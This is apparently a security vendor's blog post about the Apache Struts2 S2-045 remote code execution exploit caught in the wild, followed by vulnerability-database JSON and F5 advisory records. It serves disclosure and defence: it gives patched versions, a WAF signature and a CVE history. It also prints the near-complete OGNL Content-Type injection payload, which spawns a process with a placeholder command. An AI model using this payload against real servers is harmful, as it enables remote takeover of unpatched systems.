Two days ago Apache has published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).
Struts2 RCE attacks in the wild
This vulnerability allows attacker to execute arbitrary Java code on the application server.
We can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.
#### Exploit
[Wallarm](<http://wallarm.com>) has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:
GET /valid-struts.action HTTP/1.1
User-Agent: any
Content-Type: %{(#_=‘multipart/form-data’).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
#### Mitigation
Please check that you’ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)
If you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It’s essentially similar to the previous OGNL exploits however it’s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:
%{(#_=’multipart/form-data’)
#### History
Here is a list of all historical OGNL security issues in Struts2:
* <https://www.cvedetails.com/cve/CVE-2016-3093/>
* <https://www.cvedetails.com/cve/CVE-2016-0785/>
* <https://www.cvedetails.com/cve/CVE-2013-2251/>
* <https://www.cvedetails.com/cve/CVE-2013-2135/>
* <https://www.cvedetails.com/cve/CVE-2013-2134/>
* <https://www.cvedetails.com/cve/CVE-2013-2115/>
* <https://www.cvedetails.com/cve/CVE-2013-1966/>
* <https://www.cvedetails.com/cve/CVE-2013-1965/>
* <https://www.cvedetails.com/cve/CVE-2012-4387/>
* <https://www.cvedetails.com/cve/CVE-2012-0838/>
* <https://www.cvedetails.com/cve/CVE-2012-0391/>
* <https://www.cvedetails.com/cve/CVE-2010-1870/>
* <https://www.cvedetails.com/cve/CVE-2008-6504/>
It means that the OGNL technology are broken altogether.

* * *
[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.
{"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "references": [], "enchantments_done": [], "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "modified": "2017-03-10T16:52:09", "lastseen": "2017-05-01T13:42:41", "published": "2017-03-09T00:15:54", "description": "Two days ago Apache has published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\nStruts2 RCE attacks in the wild\n\nThis vulnerability allows attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It\u2019s essentially similar to the previous OGNL exploits however it\u2019s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:\n \n \n %{(#_=\u2019multipart/form-data\u2019)\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nIt means that the OGNL technology are broken altogether.\n\n\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "cvelist": ["CVE-2013-1966", "CVE-2013-2251", "CVE-2012-0391", "CVE-2008-6504", "CVE-2012-0838", "CVE-2016-0785", "CVE-2010-1870", "CVE-2013-1965", "CVE-2012-4387", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2016-3093"], "viewCount": 1377, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A", "AKB:F287CDB5-FC29-49E2-B958-BAAE1EECEA70"]}, {"type": "canvas", "idList": ["STRUTS2_DEFAULT_ACTION_MAPPER", "STRUTSCODEINJECTION"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2010-141", "CPAI-2012-120", "CPAI-2013-1859", "CPAI-2013-2167", "CPAI-2013-2507", "CPAI-2015-0737"]}, {"type": "cisa", "idList": ["CISA:84B5063678E22C88DCF150A265C078F7"]}, {"type": "cisco", "idList": ["CISCO-SA-20131023-STRUTS2", "CISCO-SA-20140709-STRUTS2"]}, {"type": "cve", "idList": ["CVE-2008-6504", "CVE-2010-1870", "CVE-2012-0391", "CVE-2012-0838", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2251", "CVE-2016-0785", "CVE-2016-3093", "CVE-2016-4461"]}, {"type": "d2", "idList": ["D2SEC_STRUTS", "D2SEC_STRUTS2", "D2SEC_STRUTS4"]}, {"type": "dsquare", "idList": ["E-2", "E-30", "E-319", "E-339", "E-340", "E-341"]}, {"type": "exploitdb", "idList": ["EDB-ID:14360", "EDB-ID:44583", "EDB-ID:48917"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:79276FB192FE217AB9D7D1BAF44AF225", "EXPLOITPACK:C0CFCAABB02FC4AC5D0EF38D381E1E35"]}, {"type": "f5", "idList": ["F5:K10506844", "F5:K17588029", "F5:K20127031", "F5:K23432135", "SOL14933", "SOL15260", "SOL15261", "SOL15262", "SOL17588029", "SOL23432135"]}, {"type": "gentoo", "idList": ["GLSA-201409-04"]}, {"type": "github", "idList": ["GHSA-383P-XQXX-RRMP", "GHSA-WHMQ-V94Q-34P9"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20130730-STRUTS"]}, {"type": "ibm", "idList": ["B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "E4B17BF9EB94818B3DD67E5BE6300EFD410A818EA54EBAE7A739EFDF92086058", "F7297DEE78789012F7802C00A7D437B06424929237D39542808A1D9905687922"]}, {"type": "jvn", "idList": ["JVN:33504150", "JVN:79099262"]}, {"type": "kitploit", "idList": ["KITPLOIT:4611207874033525364", "KITPLOIT:5420210148456420402"]}, {"type": "nessus", "idList": ["ARCHIVA_1_3_8.NASL", "F5_BIGIP_SOL23432135.NASL", "GENTOO_GLSA-201409-04.NASL", "MYSQL_ENTERPRISE_MONITOR_2_3_14.NASL", "SELLIGENT_MESSAGE_STUDIO_CVE-2013-2251.NBIN", "STRUTS_2_2_1.NASL", "STRUTS_2_3_14_1.NASL", "STRUTS_2_3_14_2.NASL", "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "STRUTS_2_3_14_3.NASL", "STRUTS_2_3_14_3_COMMAND_EXECUTION.NASL", "STRUTS_2_3_14_3_S2012.NASL", "STRUTS_2_3_15_1.NASL", "STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL", "STRUTS_2_3_28_RCE.NASL", "STRUTS_2_3_28_WIN_LOCAL.NASL", "STRUTS_2_3_29_WIN_LOCAL.NASL", "STRUTS_2_3_4_1.NASL", "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE.NASL", "VMWARE_VMSA-2012-0013.NASL", "WEB_APPLICATION_SCANNING_112741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103883", "OPENVAS:1361412562310121267", "OPENVAS:1361412562310801441", "OPENVAS:1361412562310801663", "OPENVAS:1361412562310802425", "OPENVAS:1361412562310803837", "OPENVAS:1361412562310803838", "OPENVAS:1361412562310808021", "OPENVAS:1361412562310808067", "OPENVAS:801441", "OPENVAS:801663", "OPENVAS:802425", "OPENVAS:803837", "OPENVAS:803838"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2014-1972949", "ORACLE:CPUJUL2015", "ORACLE:CPUJUL2015-2367936", "ORACLE:CPUOCT2013-1899837"]}, {"type": "osv", "idList": ["OSV:GHSA-383P-XQXX-RRMP", "OSV:GHSA-WHMQ-V94Q-34P9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:104227", "PACKETSTORM:113272", "PACKETSTORM:121847", "PACKETSTORM:122541", "PACKETSTORM:122796", "PACKETSTORM:159629", "PACKETSTORM:91774"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-3093"]}, {"type": "saint", "idList": ["SAINT:05F171426D41814939EA98ED1A825F67", "SAINT:1D34925730D76AB12F475B2A125AC017", "SAINT:2158B27B9EAB9B393EED3784C4096BC1", "SAINT:279F8312DEF0028C5D034325A810E73D", "SAINT:2FE5CCE51B64707F8D205A80240A6467", "SAINT:4558D86B32E9DFCF5B5EEBFCAB072C31", "SAINT:46C06C664B1E5C691A77B2FC04327D68", "SAINT:4B122F6299581540A8429BAA06656ACE", "SAINT:52FE4CC3610DB129C039F9F864818929", "SAINT:6A7FE32298A470E879AB2C759F6C43EB", "SAINT:6E895851192B9E656298357DF24A9556", "SAINT:7B263B551E3799A3C795713D657E1BD2", "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "SAINT:828C60321F2ABC177EBA08F435872B1B", "SAINT:8B8924409E9AFE277FF0998CBA641AF8", "SAINT:D5D4A387859B0AFB11066636D506EF3B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29766", "SECURITYVULNS:DOC:30568", "SECURITYVULNS:DOC:30825", "SECURITYVULNS:VULN:13263", "SECURITYVULNS:VULN:13378", "SECURITYVULNS:VULN:13423", "SECURITYVULNS:VULN:13714", "SECURITYVULNS:VULN:13836", "SECURITYVULNS:VULN:14601"]}, {"type": "seebug", "idList": ["SSV:19954", "SSV:20526", "SSV:60807", "SSV:60812", "SSV:60836", "SSV:60906", "SSV:69390"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-1870", "UB:CVE-2012-0391", "UB:CVE-2012-0838", "UB:CVE-2012-4387", "UB:CVE-2013-1965", "UB:CVE-2013-1966", "UB:CVE-2013-2134", "UB:CVE-2013-2135", "UB:CVE-2013-2251", "UB:CVE-2016-0785", "UB:CVE-2016-3093", "UB:CVE-2016-4461"]}, {"type": "vmware", "idList": ["VMSA-2011-0005", "VMSA-2011-0005.3", "VMSA-2012-0013.2"]}, {"type": "zdt", "idList": ["1337DAY-ID-20837", "1337DAY-ID-21032", "1337DAY-ID-35084"]}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A"]}, {"type": "canvas", "idList": ["STRUTS2_DEFAULT_ACTION_MAPPER"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0737"]}, {"type": "cisco", "idList": ["CISCO-SA-20140709-STRUTS2"]}, {"type": "cve", "idList": ["CVE-2008-6504", "CVE-2016-0785"]}, {"type": "d2", "idList": ["D2SEC_STRUTS2", "D2SEC_STRUTS4"]}, {"type": "dsquare", "idList": ["E-339", "E-340"]}, {"type": "exploitdb", "idList": ["EDB-ID:14360"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:79276FB192FE217AB9D7D1BAF44AF225"]}, {"type": "f5", "idList": ["SOL14933", "SOL15260", "SOL15261", "SOL15262"]}, {"type": "ibm", "idList": ["E4B17BF9EB94818B3DD67E5BE6300EFD410A818EA54EBAE7A739EFDF92086058"]}, {"type": "jvn", "idList": ["JVN:33504150", "JVN:79099262"]}, {"type": "kitploit", "idList": ["KITPLOIT:4611207874033525364"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC"]}, {"type": "nessus", "idList": ["STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "STRUTS_2_3_28_RCE.NASL", "STRUTS_2_3_28_WIN_LOCAL.NASL", "WEB_APPLICATION_SCANNING_112741"]}, {"type": "openvas", "idList": ["OPENVAS:802425"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2015-2367936"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113272", "PACKETSTORM:122796"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-3093"]}, {"type": "saint", "idList": ["SAINT:05F171426D41814939EA98ED1A825F67", "SAINT:52FE4CC3610DB129C039F9F864818929"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30825"]}, {"type": "seebug", "idList": ["SSV:60836"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-0838", "UB:CVE-2013-1965"]}, {"type": "vmware", "idList": ["VMSA-2011-0005"]}, {"type": "zdt", "idList": ["1337DAY-ID-20837", "1337DAY-ID-35084"]}]}, "exploitation": null, "vulnersScore": 0.3}, "reporter": "Wallarm", "bulletinFamily": "blog", "type": "wallarmlab", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1659980468}, "_internal": {"score_hash": "a50bcdde4119e75201859b38de0672c4"}}
{"f5": [{"lastseen": "2017-06-08T00:16:02", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {}, "published": "2017-02-09T01:52:00", "type": "f5", "title": "Apache Struts 2 vulnerabilities CVE-2013-1966, CVE-2013-2115, CVE-2013-2134, and CVE-2013-2135", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135"], "modified": "2017-02-10T04:50:00", "id": "F5:K10506844", "href": "https://support.f5.com/csp/article/K10506844", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:08", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-06-27T00:00:00", "type": "f5", "title": "SOL23432135 - Apache Struts 2 vulnerability CVE-2016-3093", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2016-06-27T00:00:00", "id": "SOL23432135", "href": "http://support.f5.com/kb/en-us/solutions/public/k/23/sol23432135.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-06-08T00:16:33", "description": "\nF5 Product Development has assigned ID 600461 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H600514 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| 12.0.0 - 12.1.2| 13.0.0 \n11.4.0 - 11.6.1| Medium| Configuration utility \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-06-27T22:37:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2016-3093", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2017-03-13T23:05:00", "id": "F5:K23432135", "href": "https://support.f5.com/csp/article/K23432135", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2022-02-01T00:00:00", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter. ([CVE-2012-0391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>))\n\nImpact\n\nNo F5 products are affected by this vulnerability in default, standard, or recommended configurations. BIG-IP AAM is affected by this vulnerability only if the Apache Struts configuration has been deliberately configured to enable Development Mode (devMode). devMode is disabled by default on BIG-IP AAM. BIG-IP AAM 16.0.0 and later are not vulnerable, regardless of the Apache Struts configuration.\n", "cvss3": {}, "published": "2020-12-11T21:24:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2012-0391", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2020-12-11T21:24:00", "id": "F5:K20127031", "href": "https://support.f5.com/csp/article/K20127031", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:22:57", "description": "Recommended action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n", "cvss3": {}, "published": "2014-01-20T00:00:00", "type": "f5", "title": "SOL14933 - Apache Struts vulnerability CVE-2013-2251", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 